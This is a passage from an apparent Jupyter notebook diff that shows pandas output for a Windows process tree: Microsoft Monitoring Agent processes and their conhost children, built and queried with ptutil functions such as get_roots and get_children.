  \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\windows\\system32\\conhost.exe0x14682019-02-09...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\windows\\system32\\conhost.exe0x12782019-02-09...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\windows\\system32\\conhost.exe0x18342019-02-09...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ...       S-1-5-18   \n\n                                                     SubjectUserName  \\\nproc_key                                                               \nc:\\program files\\microsoft monitoring agent\\age...               NaN   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x14682019-02-09...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x12782019-02-09...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x18342019-02-09...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ...  MSTICAlertsWin1$   \n\n                                                   SubjectDomainName  \\\nproc_key                                                               \nc:\\program files\\microsoft monitoring agent\\age...               NaN   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\windows\\system32\\conhost.exe0x14682019-02-09...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\windows\\system32\\conhost.exe0x12782019-02-09...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\windows\\system32\\conhost.exe0x18342019-02-09...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ...         WORKGROUP   \n\n                                                   SubjectLogonId  \\\nproc_key                                                            \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\windows\\system32\\conhost.exe0x14682019-02-09...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\windows\\system32\\conhost.exe0x12782019-02-09...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\windows\\system32\\conhost.exe0x18342019-02-09...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ...          0x3e7   \n\n                                                   NewProcessId  ...  \\\nproc_key                                                         ...   \nc:\\program files\\microsoft monitoring agent\\age...        0x864  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0x8dc  ...   \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...       0x183c  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0xd74  ...   \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09...       0x21c8  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0x6f8  ...   \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09...       0x1c24  ...   \nc:\\program files\\microsoft monitoring agent\\age...       0x1fc0  ...   \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10...       0x17a4  ...   \nc:\\program files\\microsoft monitoring agent\\age...       0x10bc  ...   \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10...       0x1c10  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0xb48  ...   \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10...       0x235c  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0xbd0  ...   \nc:\\windows\\system32\\conhost.exe0x14682019-02-09...       0x1468  ...   \nc:\\program files\\microsoft monitoring agent\\age...       0x15c8  ...   \nc:\\windows\\system32\\conhost.exe0x12782019-02-09...       0x1278  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0xe34  ...   \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2...         0xbc  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0x53c  ...   \nc:\\windows\\system32\\conhost.exe0x18342019-02-09...       0x1834  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0xef4  ...   \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09...       0x15f4  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0xcd8  ...   \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ...        0xfd4  ...   \n\n                                                   source_index_par  \\\nproc_key                                                              \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...            998.0   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09...            749.0   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09...            883.0   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10...            549.0   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10...            478.0   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10...            553.0   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\windows\\system32\\conhost.exe0x14682019-02-09...            848.0   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\windows\\system32\\conhost.exe0x12782019-02-09...            850.0   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2...            984.0   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\windows\\system32\\conhost.exe0x18342019-02-09...            738.0   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09...            736.0   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ...            887.0   \n\n                                                   ProcessId_par  \\\nproc_key                                                           \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...         0x864   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09...         0x864   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09...         0x864   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10...         0x864   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10...         0x864   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10...         0x864   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\windows\\system32\\conhost.exe0x14682019-02-09...         0x864   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\windows\\system32\\conhost.exe0x12782019-02-09...         0x864   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2...         0x864   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\windows\\system32\\conhost.exe0x18342019-02-09...         0x864   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09...         0x864   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ...         0x864   \n\n                                                                                   NewProcessName_par  \\\nproc_key                                                                                                \nc:\\program files\\microsoft monitoring agent\\age...                                                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                                                NaN   \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...   \nc:\\program files\\microsoft monitoring agent\\age...                                                NaN   \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09...  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...   \nc:\\program files\\microsoft monitoring agent\\age...                                                NaN   \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09...  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...   \nc:\\program files\\microsoft monitoring agent\\age...                                                NaN   \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10...  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...   \nc:\\program files\\microsoft monitoring agent\\age...                                                NaN   \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10...  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...   \nc:\\program files\\microsoft monitoring agent\\age...                                                NaN   \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10...  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...   \nc:\\program files\\microsoft monitoring agent\\age...                                                NaN   \nc:\\windows\\system32\\conhost.exe0x14682019-02-09...  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...   \nc:\\program files\\microsoft monitoring agent\\age...                                                NaN   \nc:\\windows\\system32\\conhost.exe0x12782019-02-09...  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...   \nc:\\program files\\microsoft monitoring agent\\age...                                                NaN   \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2...  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...   \nc:\\program files\\microsoft monitoring agent\\age...                                                NaN   \nc:\\windows\\system32\\conhost.exe0x18342019-02-09...  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...   \nc:\\program files\\microsoft monitoring agent\\age...                                                NaN   \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09...  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...   \nc:\\program files\\microsoft monitoring agent\\age...                                                NaN   \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ...  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...   \n\n                                                          TimeGenerated_orig_par  \\\nproc_key                                                                           \nc:\\program files\\microsoft monitoring agent\\age...                           NaT   \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 00:00:00.000000000   \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 2019-02-09 21:02:56.256999936   \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 00:00:00.000000000   \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... 2019-02-09 23:22:56.256999936   \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 00:00:00.000000000   \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... 2019-02-09 23:32:56.260000000   \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 00:00:00.000000000   \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... 2019-02-10 00:02:56.256999936   \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 00:00:00.000000000   \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... 2019-02-10 00:12:56.252999936   \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 00:00:00.000000000   \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... 2019-02-10 00:32:56.270000128   \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 00:00:00.000000000   \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... 2019-02-09 21:32:56.270000128   \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 00:00:00.000000000   \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... 2019-02-09 20:32:56.260000000   \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 00:00:00.000000000   \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... 2019-02-09 22:02:56.263000064   \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 00:00:00.000000000   \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... 2019-02-09 22:32:56.247000064   \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 00:00:00.000000000   \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... 2019-02-09 22:32:56.260000000   \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 00:00:00.000000000   \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... 2019-02-09 20:52:56.260000000   \n\n                                                                                           parent_key  \\\nproc_key                                                                                                \nc:\\program files\\microsoft monitoring agent\\age...                                                NaN   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\windows\\system32\\conhost.exe0x14682019-02-09...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\windows\\system32\\conhost.exe0x12782019-02-09...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\windows\\system32\\conhost.exe0x18342019-02-09...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ...  c:\\program files\\microsoft monitoring agent\\ag...   \n\n                                                   IsRoot IsLeaf IsBranch  \\\nproc_key                                                                    \nc:\\program files\\microsoft monitoring agent\\age...   True  False    False   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...  False   True    False   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09...  False   True    False   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09...  False   True    False   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10...  False   True    False   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10...  False   True    False   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10...  False   True    False   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\windows\\system32\\conhost.exe0x14682019-02-09...  False   True    False   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\windows\\system32\\conhost.exe0x12782019-02-09...  False   True    False   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2...  False   True    False   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\windows\\system32\\conhost.exe0x18342019-02-09...  False   True    False   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09...  False   True    False   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ...  False   True    False   \n\n                                                            path parent_index  \nproc_key                                                                       \nc:\\program files\\microsoft monitoring agent\\age...          1004          NaN  \nc:\\program files\\microsoft monitoring agent\\age...       1004/10         1004  \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...    1004/10/11           10  \nc:\\program files\\microsoft monitoring agent\\age...      1004/107         1004  \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09...  1004/107/108          107  \nc:\\program files\\microsoft monitoring agent\\age...      1004/120         1004  \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09...  1004/120/121          120  \nc:\\program files\\microsoft monitoring agent\\age...      1004/127         1004  \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10...  1004/127/128          127  \nc:\\program files\\microsoft monitoring agent\\age...      1004/129         1004  \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10...  1004/129/130          129  \nc:\\program files\\microsoft monitoring agent\\age...      1004/139         1004  \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10...  1004/139/140          139  \nc:\\program files\\microsoft monitoring agent\\age...       1004/15         1004  \nc:\\windows\\system32\\conhost.exe0x14682019-02-09...    1004/15/16           15  \nc:\\program files\\microsoft monitoring agent\\age...        1004/5         1004  \nc:\\windows\\system32\\conhost.exe0x12782019-02-09...      1004/5/6            5  \nc:\\program files\\microsoft monitoring agent\\age...       1004/67         1004  \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2...    1004/67/68           67  \nc:\\program files\\microsoft monitoring agent\\age...       1004/76         1004  \nc:\\windows\\system32\\conhost.exe0x18342019-02-09...    1004/76/77           76  \nc:\\program files\\microsoft monitoring agent\\age...       1004/78         1004  \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09...    1004/78/79           78  \nc:\\program files\\microsoft monitoring agent\\age...        1004/8         1004  \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ...      1004/8/9            8  \n\n[25 rows x 35 columns]"
+       },
+       "execution_count": 5,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "3961bef2-e361-4a29-8f22-e92096d739a8",
+     "text": "s_tree"
+    },
+    "executionTime": "2019-12-13T20:28:22.067Z"
+   },
+   {
+    "cell": {
+     "executionCount": 6,
+     "executionEventId": "7c1feb49-b292-4a3a-aa57-1698f0ba5e4e",
+     "hasError": false,
+     "id": "5610ff3a-83b0-4253-92bb-feba160df533",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "25"
+       },
+       "execution_count": 6,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "3961bef2-e361-4a29-8f22-e92096d739a8",
+     "text": "ptutil.get_descendents(p_tree, ptutil.get_roots(p_tree).iloc[4])\nlen(s_tree)"
+    },
+    "executionTime": "2019-12-13T20:29:01.543Z"
+   },
+   {
+    "cell": {
+     "executionCount": 7,
+     "executionEventId": "d5d66c70-7124-4f08-8775-e833125c085e",
+     "hasError": false,
+     "id": "5610ff3a-83b0-4253-92bb-feba160df533",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "13"
+       },
+       "execution_count": 7,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "3961bef2-e361-4a29-8f22-e92096d739a8",
+     "text": "t_root = ptutil.get_roots(p_tree).iloc[4]\nfull_tree = ptutil.get_descendents(p_tree, t_root)\nassert len(s_tree) == 25\nchildren = ptutil.get_children(p_tree, t_root)\nlen(children)"
+    },
+    "executionTime": "2019-12-13T20:31:12.416Z"
+   },
+   {
+    "cell": {
+     "executionCount": 8,
+     "executionEventId": "1a560730-48b3-48a1-b69a-ebb6b2683f36",
+     "hasError": false,
+     "id": "fc64ecac-8791-4324-87f4-7ebb47f5b1ef",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "proc_key\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x15c82019-02-09 20:32:56.260000       6\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0xcd82019-02-09 20:52:56.260000     6\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x8dc2019-02-09 21:02:56.257000        7\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xbd02019-02-09 21:32:56.270000        7\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xe342019-02-09 22:02:56.263000        7\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0x53c2019-02-09 22:32:56.247000     7\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xef42019-02-09 22:32:56.260000        7\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0xd742019-02-09 23:22:56.257000     8\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x6f82019-02-09 23:32:56.260000        8\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x1fc02019-02-10 00:02:56.257000       8\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0x10bc2019-02-10 00:12:56.253000    8\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xb482019-02-10 00:32:56.270000        8\nc:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe0x8641970-01-01 00:00:00.000000                                                         4\nName: path, dtype: int64"
+       },
+       "execution_count": 8,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "56ffc00b-0809-4b5f-b6b9-bec57f7e8332",
+     "text": "children[\"path\"].str.len()"
+    },
+    "executionTime": "2019-12-13T20:37:32.652Z"
+   },
+   {
+    "cell": {
+     "executionCount": 9,
+     "executionEventId": "f12d954e-d246-4b2d-90b8-21665078f11e",
+     "hasError": false,
+     "id": "fc64ecac-8791-4324-87f4-7ebb47f5b1ef",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "proc_key\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x15c82019-02-09 20:32:56.260000       1\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0xcd82019-02-09 20:52:56.260000     1\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x8dc2019-02-09 21:02:56.257000        1\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xbd02019-02-09 21:32:56.270000        1\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xe342019-02-09 22:02:56.263000        1\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0x53c2019-02-09 22:32:56.247000     1\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xef42019-02-09 22:32:56.260000        1\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0xd742019-02-09 23:22:56.257000     1\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x6f82019-02-09 23:32:56.260000        1\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x1fc02019-02-10 00:02:56.257000       1\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0x10bc2019-02-10 00:12:56.253000    1\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xb482019-02-10 00:32:56.270000        1\nc:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe0x8641970-01-01 00:00:00.000000                                                         0\nName: path, dtype: int64"
+       },
+       "execution_count": 9,
+       "metadata": {},
